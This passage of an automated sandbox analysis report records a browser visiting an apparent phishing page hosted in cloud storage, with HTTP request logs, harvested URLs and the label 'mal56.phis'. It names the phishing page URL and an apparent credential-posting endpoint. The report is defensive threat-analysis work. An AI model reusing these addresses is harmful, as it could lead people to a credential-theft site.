Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /download/storage/v1/b/logon_id63757945b-32c6-49b0-83e6-1d93765276e7/o/index.html?jk=AFshE3VcvfzNdf-7zMKWd94-4dMrNIkOLLE47CQ43PY7P2MYpfKpiTisbCiM8ITDVUzsV5uBnwUTgNfImCvdn95XFg7yLPb4pK7mGtnykL6H73onzrS0TNqkpgxfmCGl9SjrMUh2HXQovXq0n_fa5hqbVlcfrBGOpBCkBBOuoY-yrNdFJA6qsh5mXJeZJEWhpyesRFni67jgONcRuOW0IhE2TSFjfiZ1kcHtUg4IakFROfuF2ixmgmZ0cygvwFJgzltWAi4BZy9gK7vN7kuIcB7IqaENeixO24771GkuNYSmkiDTJACa0r0VCNPcQlcK5lGRRAu7CmqBicTQElQR1sT8UAlS8qEccylxwvHxtG1ZQipoKLv7jRTmXa5gKf9qryarS-JmN2Dw-wvzqjvQU3ACMffC05IslAl45AuBr7XJD_AvOH4XV0oB1K69D_BJqrPx5F866tHjL87vL2OzmhOn2ZN6fGK9EaMH6l71egHyEMNh69wwpAccwpkljLmJNVIqygOVxaM5girr-FZHO5mJNqOa9bTFJMZFMQk75Bh1YPELgAun31aycC9L1gEIgi9xS2AI2BDHPNQB6OaElZLJZDJIsOs0jHoqoRQa-BsTDGYlSbZcoI1h5QuM3VxHMbmAZYEyCbHgEmb6QFG4Do70MelMz0hmqK1LB3zOLUGQVyL1NduEuvkLQPWtxDQ3Zeb-GyuldZGFe6ZOCmXUvu2OKrXBBFC3a0i4Io1wftvhtL1urvwaLVPFECoQBACGCtpQtZ45u5bBlHyHOYGrix_HPHteuU8UlCF1QPHHFIVg5XjWbBd9deixk_udmpRBTRN6b7-93o-J_Lga6iMebvzrAh6z2qFEd8YAqgMmCaIpY3uuMGkMbvjX_71pF2dS6_eUeo82_XpG60fSB3QZnvV0oMGUvZu6gOHeues8gSXLQCwqfhwa_7AgDj94Gv_4jjp6oSobCikZNfcIVBrhso8uTX4sUJ5X9GsLxXBisRNqpQ&isca=1 HTTP/1.1Host: 00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/download/storage/v1/b/logon_id63757945b-32c6-49b0-83e6-1d93765276e7/o/index.html?jk=AFshE3VcvfzNdf-7zMKWd94-4dMrNIkOLLE47CQ43PY7P2MYpfKpiTisbCiM8ITDVUzsV5uBnwUTgNfImCvdn95XFg7yLPb4pK7mGtnykL6H73onzrS0TNqkpgxfmCGl9SjrMUh2HXQovXq0n_fa5hqbVlcfrBGOpBCkBBOuoY-yrNdFJA6qsh5mXJeZJEWhpyesRFni67jgONcRuOW0IhE2TSFjfiZ1kcHtUg4IakFROfuF2ixmgmZ0cygvwFJgzltWAi4BZy9gK7vN7kuIcB7IqaENeixO24771GkuNYSmkiDTJACa0r0VCNPcQlcK5lGRRAu7CmqBicTQElQR1sT8UAlS8qEccylxwvHxtG1ZQipoKLv7jRTmXa5gKf9qryarS-JmN2Dw-wvzqjvQU3ACMffC05IslAl45AuBr7XJD_AvOH4XV0oB1K69D_BJqrPx5F866tHjL87vL2OzmhOn2ZN6fGK9EaMH6l71egHyEMNh69wwpAccwpkljLmJNVIqygOVxaM5girr-FZHO5mJNqOa9bTFJMZFMQk75Bh1YPELgAun31aycC9L1gEIgi9xS2AI2BDHPNQB6OaElZLJZDJIsOs0jHoqoRQa-BsTDGYlSbZcoI1h5QuM3VxHMbmAZYEyCbHgEmb6QFG4Do70MelMz0hmqK1LB3zOLUGQVyL1NduEuvkLQPWtxDQ3Zeb-GyuldZGFe6ZOCmXUvu2OKrXBBFC3a0i4Io1wftvhtL1urvwaLVPFECoQBACGCtpQtZ45u5bBlHyHOYGrix_HPHteuU8UlCF1QPHHFIVg5XjWbBd9deixk_udmpRBTRN6b7-93o-J_Lga6iMebvzrAh6z2qFEd8YAqgMmCaIpY3uuMGkMbvjX_71pF2dS6_eUeo82_XpG60fSB3QZnvV0oMGUvZu6gOHeues8gSXLQCwqfhwa_7AgDj94Gv_4jjp6oSobCikZNfcIVBrhso8uTX4sUJ5X9GsLxXBisRNqpQ&isca=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/download/storage/v1/b/logon_id63757945b-32c6-49b0-83e6-1d93765276e7/o/index.html?jk=AFshE3VcvfzNdf-7zMKWd94-4dMrNIkOLLE47CQ43PY7P2MYpfKpiTisbCiM8ITDVUzsV5uBnwUTgNfImCvdn95XFg7yLPb4pK7mGtnykL6H73onzrS0TNqkpgxfmCGl9SjrMUh2HXQovXq0n_fa5hqbVlcfrBGOpBCkBBOuoY-yrNdFJA6qsh5mXJeZJEWhpyesRFni67jgONcRuOW0IhE2TSFjfiZ1kcHtUg4IakFROfuF2ixmgmZ0cygvwFJgzltWAi4BZy9gK7vN7kuIcB7IqaENeixO24771GkuNYSmkiDTJACa0r0VCNPcQlcK5lGRRAu7CmqBicTQElQR1sT8UAlS8qEccylxwvHxtG1ZQipoKLv7jRTmXa5gKf9qryarS-JmN2Dw-wvzqjvQU3ACMffC05IslAl45AuBr7XJD_AvOH4XV0oB1K69D_BJqrPx5F866tHjL87vL2OzmhOn2ZN6fGK9EaMH6l71egHyEMNh69wwpAccwpkljLmJNVIqygOVxaM5girr-FZHO5mJNqOa9bTFJMZFMQk75Bh1YPELgAun31aycC9L1gEIgi9xS2AI2BDHPNQB6OaElZLJZDJIsOs0jHoqoRQa-BsTDGYlSbZcoI1h5QuM3VxHMbmAZYEyCbHgEmb6QFG4Do70MelMz0hmqK1LB3zOLUGQVyL1NduEuvkLQPWtxDQ3Zeb-GyuldZGFe6ZOCmXUvu2OKrXBBFC3a0i4Io1wftvhtL1urvwaLVPFECoQBACGCtpQtZ45u5bBlHyHOYGrix_HPHteuU8UlCF1QPHHFIVg5XjWbBd9deixk_udmpRBTRN6b7-93o-J_Lga6iMebvzrAh6z2qFEd8YAqgMmCaIpY3uuMGkMbvjX_71pF2dS6_eUeo82_XpG60fSB3QZnvV0oMGUvZu6gOHeues8gSXLQCwqfhwa_7AgDj94Gv_4jjp6oSobCikZNfcIVBrhso8uTX4sUJ5X9GsLxXBisRNqpQ&isca=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/download/storage/v1/b/logon_id63757945b-32c6-49b0-83e6-1d93765276e7/o/index.html?jk=AFshE3VcvfzNdf-7zMKWd94-4dMrNIkOLLE47CQ43PY7P2MYpfKpiTisbCiM8ITDVUzsV5uBnwUTgNfImCvdn95XFg7yLPb4pK7mGtnykL6H73onzrS0TNqkpgxfmCGl9SjrMUh2HXQovXq0n_fa5hqbVlcfrBGOpBCkBBOuoY-yrNdFJA6qsh5mXJeZJEWhpyesRFni67jgONcRuOW0IhE2TSFjfiZ1kcHtUg4IakFROfuF2ixmgmZ0cygvwFJgzltWAi4BZy9gK7vN7kuIcB7IqaENeixO24771GkuNYSmkiDTJACa0r0VCNPcQlcK5lGRRAu7CmqBicTQElQR1sT8UAlS8qEccylxwvHxtG1ZQipoKLv7jRTmXa5gKf9qryarS-JmN2Dw-wvzqjvQU3ACMffC05IslAl45AuBr7XJD_AvOH4XV0oB1K69D_BJqrPx5F866tHjL87vL2OzmhOn2ZN6fGK9EaMH6l71egHyEMNh69wwpAccwpkljLmJNVIqygOVxaM5girr-FZHO5mJNqOa9bTFJMZFMQk75Bh1YPELgAun31aycC9L1gEIgi9xS2AI2BDHPNQB6OaElZLJZDJIsOs0jHoqoRQa-BsTDGYlSbZcoI1h5QuM3VxHMbmAZYEyCbHgEmb6QFG4Do70MelMz0hmqK1LB3zOLUGQVyL1NduEuvkLQPWtxDQ3Zeb-GyuldZGFe6ZOCmXUvu2OKrXBBFC3a0i4Io1wftvhtL1urvwaLVPFECoQBACGCtpQtZ45u5bBlHyHOYGrix_HPHteuU8UlCF1QPHHFIVg5XjWbBd9deixk_udmpRBTRN6b7-93o-J_Lga6iMebvzrAh6z2qFEd8YAqgMmCaIpY3uuMGkMbvjX_71pF2dS6_eUeo82_XpG60fSB3QZnvV0oMGUvZu6gOHeues8gSXLQCwqfhwa_7AgDj94Gv_4jjp6oSobCikZNfcIVBrhso8uTX4sUJ5X9GsLxXBisRNqpQ&isca=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/download/storage/v1/b/logon_id63757945b-32c6-49b0-83e6-1d93765276e7/o/index.html?jk=AFshE3VcvfzNdf-7zMKWd94-4dMrNIkOLLE47CQ43PY7P2MYpfKpiTisbCiM8ITDVUzsV5uBnwUTgNfImCvdn95XFg7yLPb4pK7mGtnykL6H73onzrS0TNqkpgxfmCGl9SjrMUh2HXQovXq0n_fa5hqbVlcfrBGOpBCkBBOuoY-yrNdFJA6qsh5mXJeZJEWhpyesRFni67jgONcRuOW0IhE2TSFjfiZ1kcHtUg4IakFROfuF2ixmgmZ0cygvwFJgzltWAi4BZy9gK7vN7kuIcB7IqaENeixO24771GkuNYSmkiDTJACa0r0VCNPcQlcK5lGRRAu7CmqBicTQElQR1sT8UAlS8qEccylxwvHxtG1ZQipoKLv7jRTmXa5gKf9qryarS-JmN2Dw-wvzqjvQU3ACMffC05IslAl45AuBr7XJD_AvOH4XV0oB1K69D_BJqrPx5F866tHjL87vL2OzmhOn2ZN6fGK9EaMH6l71egHyEMNh69wwpAccwpkljLmJNVIqygOVxaM5girr-FZHO5mJNqOa9bTFJMZFMQk75Bh1YPELgAun31aycC9L1gEIgi9xS2AI2BDHPNQB6OaElZLJZDJIsOs0jHoqoRQa-BsTDGYlSbZcoI1h5QuM3VxHMbmAZYEyCbHgEmb6QFG4Do70MelMz0hmqK1LB3zOLUGQVyL1NduEuvkLQPWtxDQ3Zeb-GyuldZGFe6ZOCmXUvu2OKrXBBFC3a0i4Io1wftvhtL1urvwaLVPFECoQBACGCtpQtZ45u5bBlHyHOYGrix_HPHteuU8UlCF1QPHHFIVg5XjWbBd9deixk_udmpRBTRN6b7-93o-J_Lga6iMebvzrAh6z2qFEd8YAqgMmCaIpY3uuMGkMbvjX_71pF2dS6_eUeo82_XpG60fSB3QZnvV0oMGUvZu6gOHeues8gSXLQCwqfhwa_7AgDj94Gv_4jjp6oSobCikZNfcIVBrhso8uTX4sUJ5X9GsLxXBisRNqpQ&isca=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: Filtering Rules.0.drString found in binary or memory: www.facebook.com/ajax/ads/ equals www.facebook.com (Facebook)
    Source: Filtering Rules.0.drString found in binary or memory: www.facebook.com0 equals www.facebook.com (Facebook)
    Source: angular.js.0.drString found in binary or memory: http://angularjs.org
    Source: data_3.2.drString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
    Source: data_3.2.drString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
    Source: data_3.2.drString found in binary or memory: http://crls.pki.goog/gts1c3/fVJxbV-Ktmk.crl0
    Source: angular.js.0.drString found in binary or memory: http://errors.angularjs.org/1.6.4-local
    Source: pnacl_public_x86_64_pnacl_sz_nexe.0.drString found in binary or memory: http://llvm.org/):
    Source: data_3.2.drString found in binary or memory: http://ocsp.pki.goog/gsr10)
    Source: data_3.2.drString found in binary or memory: http://ocsp.pki.goog/gts1c301
    Source: data_3.2.drString found in binary or memory: http://ocsp.pki.goog/gtsr100
    Source: data_3.2.drString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
    Source: data_3.2.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
    Source: data_3.2.drString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
    Source: mirroring_hangouts.js.0.drString found in binary or memory: http://tools.ietf.org/html/rfc1950
    Source: mirroring_hangouts.js.0.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: mirroring_hangouts.js.0.drString found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions
    Source: mirroring_hangouts.js.0.drString found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions-01
    Source: 87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.drString found in binary or memory: https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com
    Source: History.0.drString found in binary or memory: https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/download/storage/v1
    Source: data_1.2.drString found in binary or memory: https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/favicon.ico
    Source: data_1.2.drString found in binary or memory: https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/favicon.icoChIKBw2D
    Source: Reporting and NEL.2.drString found in binary or memory: https://a.nel.cloudflare.com/report/v3?s=E7BwEBO%2FNJbH8jI5GxGK1G4KpkHazo5UjO2gc%2FDQ9HL7lJ2GvAjzObc
    Source: Reporting and NEL.2.drString found in binary or memory: https://a.nel.cloudflare.com/report/v3?s=SiYnHebMjN373%2B5EkY%2FlpsMd8SEgwXmx394Z0tAo9xol7i6PO7z0fux
    Source: 87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.dr, manifest.json0.0.drString found in binary or memory: https://accounts.google.com
    Source: craw_window.js.0.drString found in binary or memory: https://accounts.google.com/MergeSession
    Source: 87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.drString found in binary or memory: https://ajax.googleapis.com
    Source: data_3.2.dr, data_1.2.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
    Source: 87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.dr, manifest.json0.0.drString found in binary or memory: https://apis.google.com
    Source: mirroring_common.js.0.drString found in binary or memory: https://apis.google.com/js/client.js
    Source: mirroring_common.js.0.drString found in binary or memory: https://castedumessaging-pa.googleapis.com/v1
    Source: data_3.2.dr, data_1.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
    Source: data_1.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jskf
    Source: pnacl_public_x86_64_libcrt_platform_a.0.drString found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-clang.git
    Source: pnacl_public_x86_64_libcrt_platform_a.0.drString found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
    Source: 87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.drString found in binary or memory: https://clients2.google.com
    Source: mirroring_hangouts.js.0.dr, mirroring_cast_streaming.js.0.drString found in binary or memory: https://clients2.google.com/cr/report
    Source: manifest.json1.0.dr, manifest.json0.0.drString found in binary or memory: https://clients2.google.com/service/update2/crx
    Source: 87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.drString found in binary or memory: https://clients2.googleusercontent.com
    Source: mirroring_hangouts.js.0.drString found in binary or memory: https://clients6.google.com
    Source: pnacl_public_x86_64_ld_nexe.0.drString found in binary or memory: https://code.google.com/p/nativeclient/issues/entry
    Source: pnacl_public_x86_64_ld_nexe.0.drString found in binary or memory: https://code.google.com/p/nativeclient/issues/entry%s:
    Source: data_3.2.dr, data_1.2.drString found in binary or memory: https://code.jquery.com/jquery-3.2.1.slim.min.js
    Source: 87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.drString found in binary or memory: https://content-autofill.googleapis.com
    Source: data_1.2.drString found in binary or memory: https://content-autofill.googleapis.com/v1/pages/Chc2LjEuMTcxNS4xNDQyL2VuIChHR0xMKRIfCWWB9QQH7ZIQEgk
    Source: manifest.json0.0.drString found in binary or memory: https://content.googleapis.com
    Source: mirroring_cast_streaming.js.0.dr, common.js.0.drString found in binary or memory: https://crash.corp.google.com/samples?reportid=&q=
    Source: LICENSE.txt.0.drString found in binary or memory: https://creativecommons.org/.
    Source: LICENSE.txt.0.drString found in binary or memory: https://creativecommons.org/compatiblelicenses
    Source: mirroring_hangouts.js.0.drString found in binary or memory: https://creativecommons.org/publicdomain/zero/1.0/.
    Source: data_3.2.drString found in binary or memory: https://csp.withgoogle.com/csp/hosted-libraries-pushers
    Source: data_3.2.drString found in binary or memory: https://csp.withgoogle.com/csp/hosted-libraries-pushersCross-Origin-Resource-Policy:
    Source: data_3.2.dr, Reporting and NEL.2.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/encsid_AZM8iraMxxUfRnRum-EGst9UuHcPNVSf9Kp1_90wIgU
    Source: data_3.2.dr, Reporting and NEL.2.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushers
    Source: 87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, fb916b91-1de5-4a97-a1b9-d05f0ecb0538.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.dr, 90ffbf66-70a1-431f-ab38-4e0141a0e529.tmp.2.drString found in binary or memory: https://dns.google
    Source: mirroring_common.js.0.drString found in binary or memory: https://docs.google.com
    Source: LICENSE.txt.0.drString found in binary or memory: https://easylist.to/)
    Source: manifest.json0.0.drString found in binary or memory: https://feedback.googleusercontent.com
    Source: 87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.drString found in binary or memory: https://fonts.googleapis.com
    Source: data_3.2.dr, data_1.2.drString found in binary or memory: https://fonts.googleapis.com/css?family=Archivo
    Source: manifest.json0.0.drString found in binary or memory: https://fonts.googleapis.com;
    Source: data_3.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.drString found in binary or memory: https://fonts.gstatic.com
    Source: data_2.2.drString found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v12/tss0ApVBdCYD5Q7hcxTE1ArZ0bb-iXxi2g.woff2)
    Source: data_2.2.drString found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v12/tss0ApVBdCYD5Q7hcxTE1ArZ0bb_iXxi2g.woff2)
    Source: data_2.2.drString found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v12/tss0ApVBdCYD5Q7hcxTE1ArZ0bbwiXw.woff2)
    Source: manifest.json0.0.drString found in binary or memory: https://fonts.gstatic.com;
    Source: material_css_min.css.0.drString found in binary or memory: https://github.com/angular/material
    Source: LICENSE.txt.0.drString found in binary or memory: https://github.com/easylist)
    Source: craw_window.js.0.dr, craw_background.js.0.drString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
    Source: mirroring_hangouts.js.0.drString found in binary or memory: https://github.com/madler/zlib/blob/master/zlib.h
    Source: mirroring_hangouts.js.0.drString found in binary or memory: https://hangouts.clients6.google.com
    Source: manifest.json0.0.drString found in binary or memory: https://hangouts.google.com/
    Source: mirroring_hangouts.js.0.drString found in binary or memory: https://hangouts.google.com/hangouts/_/logpref
    Source: data_3.2.drString found in binary or memory: https://ka-f.fontawesome.com
    Source: data_1.2.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/css/free-v4-shims.min.css?token=585b051251
    Source: data_1.2.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/css/free.min.css?token=585b051251
    Source: data_3.2.drString found in binary or memory: https://kit.fontawesome.com
    Source: data_1.2.drString found in binary or memory: https://kit.fontawesome.com/585b051251.js
    Source: data_3.2.drString found in binary or memory: https://laskyduniganprivatlab.com/common/logon/next.php
    Source: data_3.2.dr, data_1.2.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
    Source: data_3.2.dr, data_1.2.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
    Source: data_1.2.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsM
    Source: mirroring_common.js.0.drString found in binary or memory: https://meet.google.com
    Source: mirroring_hangouts.js.0.drString found in binary or memory: https://meetings.clients6.google.com
    Source: mirroring_common.js.0.drString found in binary or memory: https://networktraversal.googleapis.com/v1alpha
    Source: 87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.drString found in binary or memory: https://ogs.google.com
    Source: craw_window.js.0.dr, manifest.json.0.drString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
    Source: data_3.2.drString found in binary or memory: https://pki.goog/repository/0
    Source: 87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.drString found in binary or memory: https://play.google.com
    Source: mirroring_hangouts.js.0.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
    Source: mirroring_hangouts.js.0.drString found in binary or memory: https://preprod-hangouts-googleapis.sandbox.google.com
    Source: 87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.drString found in binary or memory: https://r4---sn-4g5ednsd.gvt1.com
    Source: data_1.2.drString found in binary or memory: https://r4---sn-4g5ednsd.gvt1.com/edgedl/chrome/dict/en-us-9-0.bdic?cms_redirect=yes&mh=I2&mip=102.1
    Source: 87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.drString found in binary or memory: https://redirector.gvt1.com
    Source: data_1.2.drString found in binary or memory: https://redirector.gvt1.com/edgedl/chrome/dict/en-us-9-0.bdic
    Source: craw_window.js.0.dr, manifest.json.0.drString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
    Source: 87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.drString found in binary or memory: https://ssl.gstatic.com
    Source: data_3.2.dr, data_1.2.drString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
    Source: messages.json41.0.dr, feedback.html.0.drString found in binary or memory: https://support.google.com/chromecast/answer/2998456
    Source: messages.json41.0.dr, feedback.html.0.drString found in binary or memory: https://support.google.com/chromecast/troubleshooter/2995236
    Source: craw_window.js.0.dr, craw_background.js.0.drString found in binary or memory: https://www-googleapis-staging.sandbox.google.com
    Source: 87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.dr, manifest.json0.0.drString found in binary or memory: https://www.google.com
    Source: manifest.json.0.drString found in binary or memory: https://www.google.com/
    Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
    Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/images/cleardot.gif
    Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/images/dot2.gif
    Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/images/x2.gif
    Source: craw_background.js.0.drString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
    Source: mirroring_hangouts.js.0.drString found in binary or memory: https://www.google.com/log?format=json&hasfast=true
    Source: feedback_script.js.0.drString found in binary or memory: https://www.google.com/tools/feedback
    Source: manifest.json0.0.drString found in binary or memory: https://www.google.com;
    Source: 87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.dr, craw_window.js.0.dr, craw_background.js.0.drString found in binary or memory: https://www.googleapis.com
    Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/
    Source: manifest.json0.0.drString found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
    Source: manifest.json0.0.drString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
    Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
    Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
    Source: manifest.json0.0.drString found in binary or memory: https://www.googleapis.com/auth/clouddevices
    Source: manifest.json0.0.drString found in binary or memory: https://www.googleapis.com/auth/hangouts
    Source: manifest.json0.0.drString found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
    Source: manifest.json0.0.drString found in binary or memory: https://www.googleapis.com/auth/meetings
    Source: manifest.json0.0.drString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
    Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/sierra
    Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
    Source: manifest.json0.0.drString found in binary or memory: https://www.googleapis.com/auth/userinfo.email
    Source: mirroring_common.js.0.drString found in binary or memory: https://www.googleapis.com/calendar/v3
    Source: mirroring_common.js.0.drString found in binary or memory: https://www.googleapis.com/hangouts/v1
    Source: 87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.drString found in binary or memory: https://www.gstatic.com
    Source: common.js.0.drString found in binary or memory: https://www.gstatic.com/hangouts_echo_detector/release/%
    Source: manifest.json0.0.drString found in binary or memory: https://www.gstatic.com;
    Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Temp\355ccfc9-9128-4468-993c-4589a3e25f47.tmpJump to behavior
    Source: classification engineClassification label: mal56.phis.win@32/242@10/9
